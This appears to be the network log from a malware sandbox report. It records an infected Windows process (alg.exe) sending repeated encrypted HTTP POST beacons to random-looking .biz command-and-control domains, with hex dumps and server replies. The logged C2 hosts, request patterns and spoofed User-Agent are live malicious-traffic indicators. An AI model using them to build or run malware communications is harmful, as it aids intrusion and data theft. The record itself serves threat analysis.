                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.598232985 CET778OUTData Raw: cc 96 b7 8a 5a 40 fc 2b fe 02 00 00 b7 fa 6e 3e 2a 36 e9 a7 14 55 e7 78 6d ec c2 2c 08 10 d2 9b 6c 8a 9f 18 c4 f8 40 38 99 06 a9 74 34 80 29 54 2a bf c0 65 21 fe 47 dd ed 12 eb 57 cc 56 f5 5b 32 7e d4 79 48 2d 56 ca 4e 91 cf a6 07 ff a3 e3 d7 a6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Z@+n>*6Uxm,l@8t4)T*e!GWV[2~yH-VNjb-z{\=(CGULFy/mg*P-(9\c\V`F8PAQcXwrpyI*6SB.1O
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.389439106 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.485687971 CET352OUTPOST /aisrtinfavo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.485749960 CET778OUTData Raw: 2a 14 68 27 e8 1d c6 e1 fe 02 00 00 9a a1 d8 8c 3e e0 b0 ec c0 08 1d 14 77 ec e6 d1 41 c8 4e 21 db 05 40 d9 bc 05 d0 e7 a4 1f 21 8a 06 28 02 f6 a0 92 d6 e1 11 8e 94 28 54 7d 3d 5b a6 9b 91 c7 c8 95 07 86 f2 10 c9 40 94 49 47 90 11 d6 76 2f 8f 56
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: *h'>wAN!@!((T}=[@IGv/Vu%^^4}xE=5zB[U7oDJSGs||~VQV-7il%"WWgxCcL4Dq2p^*6M#}`17.yy"BV
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.706978083 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      49192.168.2.75002882.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.074286938 CET352OUTPOST /gsvxqic HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.074286938 CET842OUTData Raw: 86 b9 5c 6e 38 0b 6f 59 3e 03 00 00 ea d1 c8 19 29 f0 06 e0 54 f0 6b 9d 6c da a0 9c 5c f5 54 29 23 04 11 01 92 24 4b e7 66 1e 24 d0 b0 bc 2d 26 c4 cb d7 e4 44 71 c4 b5 dc 89 83 26 df be 67 37 80 87 c2 09 9b 93 02 9f 2a af 18 dd 59 e4 ec ec 9a 72
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: \n8oY>)Tkl\T)#$Kf$-&Dq&g7*YrhV+08,*f;%HeG\f_P-M@;Tkm=T~Ta[mP0<zaQC/@I&Z"ehC5C#u=UA~


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      50192.168.2.75002954.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.020060062 CET349OUTPOST /jfcm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.020090103 CET778OUTData Raw: 84 72 8d 79 2c 21 c7 36 fe 02 00 00 d9 7c 2a 29 35 22 a0 01 16 d7 cd 4f b6 d2 8f 63 32 06 b6 08 77 24 c1 ff c4 d1 4f e1 94 5c 1e 08 34 67 6f 35 c9 25 e3 88 c1 15 24 46 b3 fa 05 c5 86 4c d9 dc 5f b4 31 83 5f 99 e3 d7 cf 3f 5a 31 74 76 bb bb eb e3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ry,!6|*)5"Oc2w$O\4go5%$FL_1_?Z1tv0iUpAjk,Fu{"8)!3y+%q!UC8Zk[iaG9G&2^E:#U ^i4nI-_"Q>K1FcS8E$rjPD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.869700909 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=b7c85a06e63501217db7a5a8f57c9373|155.94.241.187|1731920271|1731920271|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      51192.168.2.750030208.100.26.245805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.118402958 CET345OUTPOST /xg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.120230913 CET778OUTData Raw: c5 96 59 9e 93 11 72 f1 fe 02 00 00 46 67 cd c0 5d 73 c7 37 60 27 cf 14 95 55 cc 09 fc 62 24 37 f1 60 6e c6 72 00 38 c7 15 3c 7a 3d b6 e1 1a 80 14 e5 78 80 1e db 85 ab 62 75 be 61 1a 5f 2a e0 6f 6d 21 6e c6 3e 46 85 a4 b0 99 8b 9c 89 8e af ae 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: YrFg]s7`'Ub$7`nr8<z=xbua_*om!n>F\|=MMODiY:a8`7nJyJOE3g)ZhJelz6}9IcLg[>v)%Att[5k3!&HjaOg EVCvy&b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.754798889 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.821724892 CET359OUTPOST /soxbjfwpcadsyans HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.821757078 CET778OUTData Raw: ef 66 89 7b bf 15 62 83 fe 02 00 00 81 0e 13 96 96 a3 63 9e 62 2b dd 7b b0 c2 68 e0 da d5 d5 40 bc ce 23 75 8a c2 3d f6 f5 78 8b 8a b8 87 c1 57 d8 3c 2c 35 17 64 2d 0e ac 23 bf 6e 81 df 1e 12 ea d9 a3 48 03 1e 81 20 9d 55 03 96 9d af b7 3b f7 ca
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: f{bcb+{h@#u=xW<,5d-#nH U;>}Y[AC#%JeUyc3SD dyqaHr]d"H10Ue2q fHKozG12tv;k)_85Uv\AWBE_Ys&
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.966598034 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      52192.168.2.75003134.211.97.45805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:53.959300041 CET356OUTPOST /wsppsfoumisskbo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:53.959326029 CET778OUTData Raw: dd 6d 24 36 0d 56 3f a6 fe 02 00 00 fd 3f 9a a8 bf f2 75 ba 3b cf d3 00 a9 6c c6 a0 4b ba b3 f6 8d b9 3f 8c 9a 9c 42 39 b6 58 9a d5 85 d1 f1 43 0a 8a ae 48 9a 72 b5 5a 2d c2 01 a8 c2 eb 30 5b 8c 90 94 35 3d d9 12 12 35 27 8f df 76 cc d4 65 78 b7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: m$6V??u;lK?B9XCHrZ-0[5=5'vex\)9eji3n)[)0jmBmgACj_A _z@T1yNB~Ubr '>HA*ax1E/"p4fU2JnY&
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:54.800717115 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e9586c757db92bd241c18209398f6326|155.94.241.187|1731920274|1731920274|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      53192.168.2.75003254.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:55.195871115 CET346OUTPOST /ja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:55.195871115 CET778OUTData Raw: b2 bc e2 d1 4c b6 d5 94 fe 02 00 00 13 5a eb cb 49 5a 66 75 8f 04 f7 c7 cd a7 b7 07 cf bc 60 18 fa f2 6e 42 c2 bf b0 6a 05 51 3b 36 bc f7 90 d9 f1 4d 2f a3 09 75 3c 74 1d 93 ad f5 f9 ba 65 64 fb 98 c2 d7 c7 28 87 28 07 a6 6b f0 55 17 af 28 32 18
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: LZIZfu`nBjQ;6M/u<ted((kU(2D "8SjRnMBtncn4.];}q?{H;W|:JRlnfq; zRX_#*#m!IIre$BnY_<M1Y:!Y
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.016350031 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=916e6c100105850ae58e2c24e708e55a|155.94.241.187|1731920275|1731920275|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      54192.168.2.75003318.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.770996094 CET352OUTPOST /rbpfcskrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.771013021 CET778OUTData Raw: 52 c3 a1 6a 14 78 d5 12 fe 02 00 00 b3 63 c3 c2 a5 64 0b d9 c6 9f 8f 39 15 0e 10 d6 65 4f 70 eb 20 99 16 38 df 36 d5 28 aa 29 ca 99 4f 71 03 cc 9d 4c 14 25 93 8b e9 d9 dc 44 8b 23 e6 f6 c6 88 20 ea 21 6a 85 7c a7 8f 36 9d ab 7a bd a5 cc 23 e0 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Rjxcd9eOp 86()OqL%D# !j|6z#\Mivx|R&FS|/s}|E*Msh-ZaO}Jv.P,/uup$mV[wj$8wIq}rm%QXjNd&2ZH}i~~_ozd7i">Zsr
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.230818033 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f1c76a6b0664e27a5de9579e410d34b5|155.94.241.187|1731920277|1731920277|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      55192.168.2.75003482.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.566523075 CET349OUTPOST /bnhm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.566591978 CET842OUTData Raw: f3 67 ad a5 52 bf 89 ac 3e 03 00 00 bf 44 d9 b4 57 eb 8f 2b 3e eb 07 a2 61 95 46 fc bf 17 8c 38 ae 95 3f 1e be a9 98 5d cf e6 a6 be 1e 2a 4b 5e 3e 0e 15 10 a5 8b 94 17 4d 92 eb db 3b 13 1f 66 d6 37 8f 2e 07 40 97 bc c7 dd 35 8d 94 84 9b 30 89 1f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: gR>DW+>aF8?]*K^>M;f7.@50[|~J(8Z"{i".t@!IpV'=]<s@0\I|P]U4rd*gt@LU1=e`^G uEw$*B^\?X`


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      56192.168.2.75003518.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.763412952 CET355OUTPOST /srhcrhfsmrpwwl HTTP/1.1
